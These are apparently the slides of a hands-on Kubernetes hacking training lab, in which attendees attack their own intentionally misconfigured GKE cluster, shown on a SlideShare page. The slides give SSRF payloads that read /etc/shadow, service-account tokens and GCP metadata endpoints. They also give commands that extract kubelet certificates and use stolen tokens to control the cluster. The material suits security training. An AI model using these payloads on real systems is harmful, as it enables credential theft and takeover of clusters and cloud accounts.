SlideShare a Scribd company logo
Appsecco Case Studies
2022 mid-year
Some of our work so far in 2022
15th Dec 2023
What will
we do
today?
1. Deploy a GKE cluster in our own accounts
and setup some misconfigurations to exploit
2. Talk about some relevant Kubernetes controls
for today's masterclass
3. Attack our own setup to exploit RBAC and pod
level access to compromise the cluster
4. Q&A
o use the Q&A and chat feature, send your
questions etc. I will comment/answer as and
when I see them.
Let's deploy our
cluster!
(Lab setup)
Download the following file and open it in a text editor.
DO NOT RUN ANY COMMANDS YET!
https://appsecco-masterclass.s3.amazonaws.com/commands.txt
Login to Google Cloud Console and in the same browser open a
Google CloudShell in a new tab. Make sure your project is selected
for CloudShell.
https://console.cloud.google.com/
https://shell.cloud.google.com/?show=terminal
Make sure you run the commands from the Google CloudShell
1. Run the commands from commands.txt to create your cluster. Read the
comments to understand what the commands are doing.
2. Note the IP address printed at the end of the command
Kubernetes
Security Controls
(Hands-On)
Kubernetes, and depending on the cloud platform it is run on top of, has
multiple security features and controls built into the environment.
• As hackers we rely on these to be misconfigured or absent :)
We will look at 2 main security/concepts in Kubernetes, relevant to our class
today
1. Pod Security Admission
2. Role Based Access Control
1. Let's create 2 namespaces each with a different Pod Security Standard
2. Go to the `~/masterclass/pod-admission-controller-lab` folder
and run these commands to create new namespaces
o kubectl apply -f restricted-namespace.yaml
o kubectl apply -f privileged-namespace.yaml
3. Now attempt to start a privileged pod within each of the namespaces
o kubectl get ns
o kubectl apply -f nginx-privileged.yaml -n privileged-namespace
o kubectl apply -f nginx-privileged.yaml -n restricted-namespace
4. What do you see?
Pod Admission Controller – In simple terms
• This is code that intercepts requests reaching the API server to verify if
the object (pod, namespace etc.) create request passes a list of allowed
checks or not.
o The list of checks the request is compared against are called the Pod
Security Standards
o There are 3 standards - privileged, baseline, and restricted
Let's enumerate what roles and clusterroles are present in this cluster
and how they are bound
1. Enumerate roles within the kube-system namespace
o kubectl get roles -n kube-system
o kubectl get rolebindings -n kube-system
2. For each of the rolebindings enumerate the subject attached
o kubectl get rolebindings <BINDING_NAME> -n kube-system
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud-
provider --list
Let's repeat the same but with clusterroles and clusterrolebindings to
see cluster wide RBAC
1. Enumerate clusterroles across the cluster
o kubectl get clusterroles
o kubectl get clusterrolebindings
2. For the clusterrolebindings that use a privileged clusterrole, enumerate
the subject attached
o kubectl get clusterrolebindings <BINDING_NAME>
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:apps:default --list
Role and ClusterRole and Bindings
• An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions
are purely additive (there are no "deny" rules).
• A Role always sets permissions within a particular namespace;when you create a Role,you
have to specifythe namespace it belongs in.
• ClusterRole,is a non-namespaced resourceand applies to the entire cluster.
• Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service
accounts) with a roleRef pointing to the role which gives the subject the specific permissions
• If you want to define a role within a namespace,use a Role;if you want to define a role cluster-
wide, use a ClusterRole.
Role
ClusterRole
ClusterRoleBinding
RoleBinding
Abusing RBAC
privileges from
within pods
(Hands-On)
• All pods will have access to the default service account mounted as a file
system object within the pod at
o /var/run/secrets/kubernetes.io/serviceaccount/token
o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
• We can extract them and use them to interact with the cluster
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
So how do we gain access to this service account or files from the pod?
• Let's take a closer look at the app that was deployed
• Login to the application using username serveradmin and password
monitorworld
• What is the app's functionality?
• What vulnerability is present here?
• The application takes a URL from the user and makes a server side
request on the user's behalf
o Such a feature, if not protected properly is often vulnerable to Server Side
Request Forgeries (SSRF/XSPA)
• Depending on the request library used in the server side code, file:// is
also a valid request protocol and can be used to read local files!
• Try these as input
o file:///etc/passwd
o file:///etc/shadow
• Let's read the token and ca.crt so that we can interact with the cluster
using stolen credentials! Save these inside your Google CloudShell.
file:///var/run/secrets/kubernetes.io/serviceaccount/token
file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt
• Run kubectl with the token and ca.crt to gain access to the cluster using
the stolen secret of the service account
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
• Use auth plugin to view your current access with the stolen credentials
kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt -
-list
Post Exploitation
in GKE
(Hands-On / Homework)
We can go a little further with our setup in this class. We have an app with SSRF
running inside a GKE cluster. You can perform the following additional actions
1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE
information etc.
• file:///proc/self/environ
2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials
• http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env
3. Fetch the Google VM instance's compute service account's token and scope to query the
underlying cloud platform itself! This is escaping from the cluster to the cloud environment.
• http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
• http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes
• http://169.254.169.254/computeMetadata/v1/project/project-id
Env vars inside pod
kube-env from Instance Metadata
cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk
'{print $2}' | base64 -d > kubelet.crt
cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk
'{print $2}' | base64 -d > kubelet.key
cat kube-env | grep ^CA_CERT | awk '{print $2}'
| base64 -d > apiserver.crt
kubectl auth --client-certificate=kubelet.crt -
-client-key=kubelet.key --certificate-
authority=apiserver.crt --server=$KUBERNE
TES_API_SERVER can-i --list
https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
Google Cloud Compute SA Token Stealing
Tear Down the Cluster
(to avoid credit wastage)
(optional, don't if you want to practice)
1. https://kubernetes.io/docs/concepts/security/pod-security-admission/
2. https://kubernetes.io/docs/concepts/security/pod-security-standards/
3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/
4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a
5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d
7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/
8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/
9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/
10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/
11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/
12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/
13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/
14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata
15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A
16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM
17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
Q&A
• Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration
Testing as a Service at Appsecco
• Appsecco is a boutique security consulting company with
customers across the world.
• Over a decade and half experience with hacking web apps,
APIs, mobile, wireless, networks and more lately cloud and
containers
• Love to teach! Speak and train at a bunch of conferences!
https://www.linkedin.com/in/riyazw/
riyaz@appsecco.com | +91 9886042242
https://appsecco.com | https://blog.appsecco.com
About Appsecco
Pragmatic, holistic, business-focused approach
Specialist Cloud and Application Security company
Highly experienced and diverse team
Assigned multiple CVEs
Certified hackers
OWASP chapter leads
Cloud and Kubernetes security experts
Black Hat & Def Con speakers

More Related Content

What's hot

Fosdem 18: Securing embedded Systems using Virtualization
Fosdem 18: Securing embedded Systems using VirtualizationFosdem 18: Securing embedded Systems using Virtualization
Fosdem 18: Securing embedded Systems using Virtualization
The Linux Foundation
 
Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs Encoding
CheapSSLsecurity
 
A quantitative approach to trading NFTs
A quantitative approach to trading NFTsA quantitative approach to trading NFTs
A quantitative approach to trading NFTs
intotheblock
 
Blockchain: Future Legal Issues
Blockchain: Future Legal IssuesBlockchain: Future Legal Issues
Blockchain: Future Legal Issues
Mark Radcliffe
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
SUSE Labs Taipei
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF Training
Heba Hamdy Farahat
 
Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDP
Daniel T. Lee
 
Future of Blockchain
Future of BlockchainFuture of Blockchain
Future of Blockchain
Melanie Swan
 
Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...
Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...
Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...
The Linux Foundation
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
Ritesh Gupta
 
Ransomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDFRansomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDF
Andy Thompson
 
DDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDNDDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDN
Chao Chen
 
Understanding DPDK
Understanding DPDKUnderstanding DPDK
Understanding DPDK
Denys Haryachyy
 
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGatePLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PROIDEA
 
Internet security
Internet securityInternet security
Internet security
at1211
 
Karatcoin Pitch Deck
Karatcoin Pitch DeckKaratcoin Pitch Deck
Karatcoin Pitch Deck
Simone Orso
 
XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...
XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...
XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...
The Linux Foundation
 
Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...
Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...
Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...
Linaro
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
Jignesh Patel
 
Onion protocol
Onion protocolOnion protocol
Onion protocol
Anshu Raj
 

What's hot (20)

Fosdem 18: Securing embedded Systems using Virtualization
Fosdem 18: Securing embedded Systems using VirtualizationFosdem 18: Securing embedded Systems using Virtualization
Fosdem 18: Securing embedded Systems using Virtualization
 
Hashing vs Encryption vs Encoding
Hashing vs Encryption vs EncodingHashing vs Encryption vs Encoding
Hashing vs Encryption vs Encoding
 
A quantitative approach to trading NFTs
A quantitative approach to trading NFTsA quantitative approach to trading NFTs
A quantitative approach to trading NFTs
 
Blockchain: Future Legal Issues
Blockchain: Future Legal IssuesBlockchain: Future Legal Issues
Blockchain: Future Legal Issues
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF Training
 
Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDP
 
Future of Blockchain
Future of BlockchainFuture of Blockchain
Future of Blockchain
 
Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...
Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...
Rootlinux17: Hypervisors on ARM - Overview and Design Choices by Julien Grall...
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Ransomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDFRansomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDF
 
DDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDNDDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDN
 
Understanding DPDK
Understanding DPDKUnderstanding DPDK
Understanding DPDK
 
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGatePLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
 
Internet security
Internet securityInternet security
Internet security
 
Karatcoin Pitch Deck
Karatcoin Pitch DeckKaratcoin Pitch Deck
Karatcoin Pitch Deck
 
XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...
XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...
XPDS13: Xen in OSS based In–Vehicle Infotainment Systems - Artem Mygaiev, Glo...
 
Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...
Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...
Secure Boot on ARM systems – Building a complete Chain of Trust upon existing...
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Onion protocol
Onion protocolOnion protocol
Onion protocol
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides

12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
Suman Chakraborty
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
Kumton Suttiraksiri
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
Jerry Jalava
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
Alfonso Martino
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKE
Sreenivas Makam
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)
William Yeh
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
n|u - The Open Security Community
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDays Riga
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
Amazon Web Services
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
Velocidex Enterprises
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Qbox
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
Jitendra Bafna
 
Kubernetes Architecture with Components
 Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with Components
Ajeet Singh
 
Intro to kubernetes
Intro to kubernetesIntro to kubernetes
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloud
Ajeet Singh
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operators
peychevi
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Davide Benvegnù
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Michael Man
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Malcolm Duncanson, CISSP
 
Kubernetes security with AWS
Kubernetes security with AWSKubernetes security with AWS
Kubernetes security with AWS
Kasun Madura Rathnayaka
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides (20)

12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKE
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
 
Kubernetes Architecture with Components
 Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with Components
 
Intro to kubernetes
Intro to kubernetesIntro to kubernetes
Intro to kubernetes
 
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloud
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operators
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM Roles
 
Kubernetes security with AWS
Kubernetes security with AWSKubernetes security with AWS
Kubernetes security with AWS
 

More from Appsecco

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
Appsecco
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
Appsecco
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019
Appsecco
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
Appsecco
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
Appsecco
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
Appsecco
 

More from Appsecco (7)

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
 

Recently uploaded

Need for Speed: Removing speed bumps from your Symfony projects ⚡️
Need for Speed: Removing speed bumps from your Symfony projects ⚡️Need for Speed: Removing speed bumps from your Symfony projects ⚡️
Need for Speed: Removing speed bumps from your Symfony projects ⚡️
Łukasz Chruściel
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
Google
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
ICS
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
Green Software Development
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
rickgrimesss22
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptx
LORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptxLORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptx
LORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptx
lorraineandreiamcidl
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
Octavian Nadolu
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
Rakesh Kumar R
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
mz5nrf0n
 
What is Augmented Reality Image Tracking
What is Augmented Reality Image TrackingWhat is Augmented Reality Image Tracking
What is Augmented Reality Image Tracking
pavan998932
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
Peter Muessig
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
TheSMSPoint
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
Green Software Development
 
SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024
Hironori Washizaki
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
Gerardo Pardo-Castellote
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
lorraineandreiamcidl
 
Graspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code AnalysisGraspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code Analysis
Aftab Hussain
 
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...
kalichargn70th171
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
Hornet Dynamics
 

Recently uploaded (20)

Need for Speed: Removing speed bumps from your Symfony projects ⚡️
